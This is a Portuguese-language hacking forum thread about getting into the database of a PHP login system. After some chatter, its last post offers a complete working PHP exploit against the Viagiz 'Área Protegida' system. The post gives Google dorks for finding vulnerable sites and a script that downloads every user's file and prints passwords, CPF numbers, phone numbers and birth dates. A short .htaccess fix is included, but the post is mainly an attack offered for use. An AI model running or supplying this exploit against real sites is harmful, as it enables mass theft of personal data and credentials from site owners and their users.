Unconfigured Ad Widget

**Cypher** · 18-04-2011, 00:40

Parabens começando a estudar pelo assunto imediatamente.

**Luck in Choosing** · 26-04-2011, 16:26

esse Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... me rendeu uma bela visita a california aishaiohsasi

**leventurelle** · 26-04-2011, 21:24

ohh mano esse qual id e senha ? abraçç vlew

**leventurelle** · 26-04-2011, 22:24

poxa nao estou conseguindo ter acesso ao conteudo dos link....me ajudeeem !

**Caspers** · 15-06-2011, 14:57

explica melhor? oO

**03APR91** · 15-06-2011, 19:18

Uma explicaçăo melhor seria útil

**0KaL** · 16-06-2011, 18:52

Explicaçăo melhor Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar....

**0KaL** · 27-03-2012, 01:57

Ou usando este exploit:

Código PHP:


<?php

# Exploit Title: Área Protegida

# Google Dork: inurl:"cadastro.php" intitle:VIAGIZ

# Date: 2012-03-27

# Author: WhiteCollarGroup

# Version: 1.0

/*

"Área Protegida"

desenvolvida por Viagiz.com



Exploit desenvolvido por WhiteCollarGroup

WCG147 | 0KaL | #M0rph | NB



Dorks:

inurl:entrar.php intitle:"Página protegida"

inurl:"cadastro.php" intitle:VIAGIZ

inurl:"entrar.php" intext:"Área protegida"



Sistema: Área Protegida

Desenvolvedor: Viagiz.com

Descriçăo: Sistema de gerenciamento de usuários desenvolvido em PHP que năo requer SQL.



Falha: Acesso ao banco de dados

O sistema utiliza arquivos de texto para guardar seus dados, e năo há proteçăo contra acesso nestes arquivos.

Versőes atingidas: 1.0 (atual em 27/03/2012)



Reportagem: Năo foi possível entrar em contato com os desenvolvedores.



Resoluçăo:

Crie um arquivo de nome '.htaccess' no diretório "usuarios/" e coloque o seguinte conteúdo:

#begin

Order Allow,Deny

Deny from All

#end



*/

set_time_limit(0);

function show($msg) {

  echo $msg."\r\n";

}



show("\"Área Protegida\" (acesso ao banco de dados) Exploit\n

Coded by WhiteCollarGroup

WCG147 | 0KaL | #M0rph | NB

@WCollarGroup

whitecollar_group@hotmail.com");



if($argc!=2) {

  show("Uso: php $argv[0] [host+path]

  Exemplo:

  php $argv[0] http://www.site.com/paginaprotegida/entrar.php?url=/paginaprotegida/index.php");

  exit;

}



$path = $argv[1];

if(substr($path, -1, 1)=="/") {

  $path = substr($path, 0, -1);

}



if(strpos($path, "?")) {

  $patharr = explode("?", $path);

  $path = $patharr[0];

}



$end = end(explode("/", $path));

if(preg_match("/^(.*)\.(.*)$/", $end)) {

  $path = dirname($path)."/";

}



show("[*] Verificando vulnerabilidade...");

$payload = @file_get_contents($path."usuarios/");

if(!$payload) {

  show("[!] Năo foi possível ler o conteúdo do servidor.");

  exit;

}



show("[*] Obtendo lista de usuários...");

preg_match_all("/\.txt\">(.*)\.txt<\/a>/", $payload, $users);

//print_r($users);

show("[*] ".count($users[1])." usuários encontrados.");

show("[*] Obtendo dados dos usuários...");

foreach($users[1] as $u) {

  $dados = @file_get_contents($path."usuarios/".$u.".txt");

  $dados_r = array("<?php\n", "$", "=", "\n?>", "\n\n", "<?php", "senha", "nome", "cpf", "data", "fone", "cad");

  $dados_t = array(null, null, ": ", null, "\n", null, "Senha", "Nome", "CPF", "Nascimento", "Telefone", "Cadastro");

  $dados = str_replace($dados_r, $dados_t, $dados);

  $dados = str_replace("Senha:", "Login: $u\nSenha:", $dados);

  show($dados);

}

show("\n[*] Exploit complete.\n");

Unconfigured Ad Widget

Anúncio

Formulários para pegar o BD em 30 segundos

Formulários para pegar o BD em 30 segundos

Similar Threads

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment